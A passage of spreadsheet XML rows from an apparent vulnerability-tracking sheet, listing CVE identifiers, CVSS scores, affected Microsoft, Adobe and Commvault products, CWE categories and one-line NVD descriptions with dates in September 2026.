        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O762" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P762" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q762" s="5" t="inlineStr"/>
      <c r="R762" s="5" t="inlineStr">
        <is>
          <t>CWE-170</t>
        </is>
      </c>
      <c r="S762" s="5" t="inlineStr">
        <is>
          <t>Improper null termination in Windows Remote Desktop Protocol allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T762" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70587</t>
        </is>
      </c>
    </row>
    <row r="763">
      <c r="A763" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B763" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C763" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71330</t>
        </is>
      </c>
      <c r="D763" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E763" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F763" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G763" s="5" t="inlineStr"/>
      <c r="H763" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I763" s="5" t="inlineStr"/>
      <c r="J763" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K7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63" s="5" t="inlineStr"/>
      <c r="M763" s="5" t="inlineStr"/>
      <c r="N763" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O763" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P763" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q763" s="5" t="inlineStr"/>
      <c r="R763" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="S763" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T763" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71330</t>
        </is>
      </c>
    </row>
    <row r="764">
      <c r="A764" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B764" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C764" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72923</t>
        </is>
      </c>
      <c r="D764" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E764" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F764" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G764" s="5" t="inlineStr"/>
      <c r="H764" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I764" s="5" t="inlineStr"/>
      <c r="J764" s="5" t="inlineStr"/>
      <c r="K764" s="5" t="inlineStr"/>
      <c r="L764" s="5" t="inlineStr"/>
      <c r="M764" s="5" t="inlineStr"/>
      <c r="N764" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O764" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P764" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q764" s="5" t="inlineStr"/>
      <c r="R764" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S764"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T764" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72923</t>
        </is>
      </c>
    </row>
    <row r="765">
      <c r="A765" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B765" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C765" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72928</t>
        </is>
      </c>
      <c r="D765" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E765" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F765" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G765" s="5" t="inlineStr"/>
      <c r="H765" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I765" s="5" t="inlineStr"/>
      <c r="J765" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K765" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L765" s="5" t="inlineStr"/>
      <c r="M765" s="5" t="inlineStr"/>
      <c r="N765" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O765" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P765" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q765" s="5" t="inlineStr"/>
      <c r="R765" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S765" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T765" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72928</t>
        </is>
      </c>
    </row>
    <row r="766">
      <c r="A766" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B766" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C766" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72932</t>
        </is>
      </c>
      <c r="D766" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E766" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F766" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G766" s="5" t="inlineStr"/>
      <c r="H766" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I766" s="5" t="inlineStr"/>
      <c r="J766" s="5" t="inlineStr"/>
      <c r="K766" s="5" t="inlineStr"/>
      <c r="L766" s="5" t="inlineStr"/>
      <c r="M766" s="5" t="inlineStr"/>
      <c r="N766" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O766" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P766" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q766" s="5" t="inlineStr"/>
      <c r="R766" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S766" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Message Queuing Queue Manager allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T766" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72932</t>
        </is>
      </c>
    </row>
    <row r="767">
      <c r="A767" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B767" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C767" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72943</t>
        </is>
      </c>
      <c r="D767" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E767" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F767" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G767" s="5" t="inlineStr"/>
      <c r="H767" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I767" s="5" t="inlineStr"/>
      <c r="J767" s="5" t="inlineStr"/>
      <c r="K767" s="5" t="inlineStr"/>
      <c r="L767" s="5" t="inlineStr"/>
      <c r="M767" s="5" t="inlineStr"/>
      <c r="N767" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O767" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P767" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q767" s="5" t="inlineStr"/>
      <c r="R767" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S767" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Deployment Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T767" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72943</t>
        </is>
      </c>
    </row>
    <row r="768">
      <c r="A768" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B768" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C768" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72949</t>
        </is>
      </c>
      <c r="D768" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E768" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F768" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G768" s="5" t="inlineStr"/>
      <c r="H768" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I768" s="5" t="inlineStr"/>
      <c r="J768" s="5" t="inlineStr"/>
      <c r="K768" s="5" t="inlineStr"/>
      <c r="L768" s="5" t="inlineStr"/>
      <c r="M768" s="5" t="inlineStr"/>
      <c r="N768" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O768" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P768" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q768" s="5" t="inlineStr"/>
      <c r="R768" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S768" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows SMB Server Network Transport Driver (srvnet.sys) allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T768" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72949</t>
        </is>
      </c>
    </row>
    <row r="769">
      <c r="A769" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B769" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C769" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72954</t>
        </is>
      </c>
      <c r="D769" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E769" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F769" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G769" s="5" t="inlineStr"/>
      <c r="H769" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I769" s="5" t="inlineStr"/>
      <c r="J769" s="5" t="inlineStr"/>
      <c r="K769" s="5" t="inlineStr"/>
      <c r="L769" s="5" t="inlineStr"/>
      <c r="M769" s="5" t="inlineStr"/>
      <c r="N769" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O769" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P769" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q769" s="5" t="inlineStr"/>
      <c r="R769" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S769" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Deployment Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T769" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72954</t>
        </is>
      </c>
    </row>
    <row r="770">
      <c r="A770" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B770" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C770" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72989</t>
        </is>
      </c>
      <c r="D770" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E770" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F770" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G770" s="5" t="inlineStr"/>
      <c r="H770" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I770" s="5" t="inlineStr"/>
      <c r="J770" s="5" t="inlineStr"/>
      <c r="K770" s="5" t="inlineStr"/>
      <c r="L770" s="5" t="inlineStr"/>
      <c r="M770" s="5" t="inlineStr"/>
      <c r="N770" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O770" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P770" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q770" s="5" t="inlineStr"/>
      <c r="R770" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S770" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows Failover Cluster allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T770" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72989</t>
        </is>
      </c>
    </row>
    <row r="771">
      <c r="A771" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B771" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C771" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73017</t>
        </is>
      </c>
      <c r="D771" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E771" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F771" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G771" s="5" t="inlineStr"/>
      <c r="H771" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I771" s="5" t="inlineStr"/>
      <c r="J771" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K77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71" s="5" t="inlineStr"/>
      <c r="M771" s="5" t="inlineStr"/>
      <c r="N771" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O771" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P771" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q771" s="5" t="inlineStr"/>
      <c r="R771" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S771" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Graphics Kernel allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T771" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73017</t>
        </is>
      </c>
    </row>
    <row r="772">
      <c r="A772" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B772" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C772" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75998</t>
        </is>
      </c>
      <c r="D772" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E772" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F772" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G772" s="5" t="inlineStr"/>
      <c r="H772" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I772" s="5" t="inlineStr"/>
      <c r="J772" s="5" t="inlineStr"/>
      <c r="K772" s="5" t="inlineStr"/>
      <c r="L772" s="5" t="inlineStr"/>
      <c r="M772" s="5" t="inlineStr"/>
      <c r="N772" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O772" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P772" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q772" s="5" t="inlineStr"/>
      <c r="R772" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S772" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T772" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75998</t>
        </is>
      </c>
    </row>
    <row r="773">
      <c r="A773" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B773" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C773" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77101</t>
        </is>
      </c>
      <c r="D773" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E773" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F773" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G773" s="5" t="inlineStr"/>
      <c r="H773" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I773" s="5" t="inlineStr"/>
      <c r="J773" s="5" t="inlineStr"/>
      <c r="K773" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="L773" s="5" t="inlineStr"/>
      <c r="M773" s="5" t="inlineStr"/>
      <c r="N773" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O773" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P773" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q773" s="5" t="inlineStr"/>
      <c r="R773" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S773" s="5" t="inlineStr">
        <is>
          <t>CommServe contained a stack-based buffer overflow issue affecting service availability. Software customers upgrade to resolved maintenance release. Update CommServe.</t>
        </is>
      </c>
      <c r="T773" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77101</t>
        </is>
      </c>
    </row>
    <row r="774">
      <c r="A774" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B774" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C774" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77102</t>
        </is>
      </c>
      <c r="D774" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E774" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F774" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G774" s="5" t="inlineStr"/>
      <c r="H774" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I774" s="5" t="inlineStr"/>
      <c r="J774" s="5" t="inlineStr"/>
      <c r="K774" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="L774" s="5" t="inlineStr"/>
      <c r="M774" s="5" t="inlineStr"/>
      <c r="N774" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O774" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P774" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q774" s="5" t="inlineStr"/>
      <c r="R774" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S774" s="5" t="inlineStr">
        <is>
          <t>CommServe contained a heap-based buffer overflow issue affecting service availability. Software customers upgrade to resolved maintenance release. Update CommServe.</t>
        </is>
      </c>
      <c r="T774" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77102</t>
        </is>
      </c>
    </row>
    <row r="775">
      <c r="A775" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B775" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C775" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77103</t>
        </is>
      </c>
      <c r="D775" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E775" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F775" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G775" s="5" t="inlineStr"/>
      <c r="H775" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I775" s="5" t="inlineStr"/>
      <c r="J775" s="5" t="inlineStr"/>
      <c r="K775" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="L775" s="5" t="inlineStr"/>
      <c r="M775" s="5" t="inlineStr"/>
      <c r="N775" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O775" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P775" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q775" s="5" t="inlineStr"/>
      <c r="R775" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="S775" s="5" t="inlineStr">
        <is>
          <t>CommServe contained an authentication bypass issue affecting access authorization and information disclosure. Software customers upgrade to resolved maintenance release. Update CommServe.</t>
        </is>
      </c>
      <c r="T775" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77103</t>
        </is>
      </c>
    </row>
    <row r="776">
      <c r="A776" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B776" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C776" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77104</t>
        </is>
      </c>
      <c r="D776" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E776" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F776" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G776" s="5" t="inlineStr"/>
      <c r="H776" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I776" s="5" t="inlineStr"/>
      <c r="J776" s="5" t="inlineStr"/>
      <c r="K776" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="L776" s="5" t="inlineStr"/>
      <c r="M776" s="5" t="inlineStr"/>
      <c r="N776" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O776" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P776" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q776" s="5" t="inlineStr"/>
      <c r="R776" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S776" s="5" t="inlineStr">
        <is>
          <t>CommServe contained a path traversal issue affecting information disclosure. Software customers upgrade to resolved maintenance release. Update CommServe.</t>
        </is>
      </c>
      <c r="T776" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77104</t>
        </is>
      </c>
    </row>
    <row r="777">
      <c r="A777" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B777" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C777" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77108</t>
        </is>
      </c>
      <c r="D777" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E777" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F777" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G777" s="5" t="inlineStr"/>
      <c r="H777" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I777" s="5" t="inlineStr"/>
      <c r="J777" s="5" t="inlineStr"/>
      <c r="K777" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L777" s="5" t="inlineStr"/>
      <c r="M777" s="5" t="inlineStr"/>
      <c r="N777" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O777" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P777" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q777" s="5" t="inlineStr"/>
      <c r="R777" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S777"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T777" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77108</t>
        </is>
      </c>
    </row>
    <row r="778">
      <c r="A778" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B778" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C778" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77494</t>
        </is>
      </c>
      <c r="D778" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E778" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F778" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G778" s="5" t="inlineStr"/>
      <c r="H778" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I778" s="5" t="inlineStr"/>
      <c r="J778" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K778" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L778" s="5" t="inlineStr"/>
      <c r="M778" s="5" t="inlineStr"/>
      <c r="N778" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O778" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P778" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q778" s="5" t="inlineStr"/>
      <c r="R778" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S778" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T778" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77494</t>
        </is>
      </c>
    </row>
    <row r="779">
      <c r="A779" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B779" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C779" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77498</t>
        </is>
      </c>
      <c r="D779" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E779" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F779" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G779" s="5" t="inlineStr"/>
      <c r="H779" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I779" s="5" t="inlineStr"/>
      <c r="J779" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K779" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L779" s="5" t="inlineStr"/>
      <c r="M779" s="5" t="inlineStr"/>
      <c r="N779" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O779" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P779" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q779" s="5" t="inlineStr"/>
      <c r="R779" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S779" s="5" t="inlineStr">
        <is>
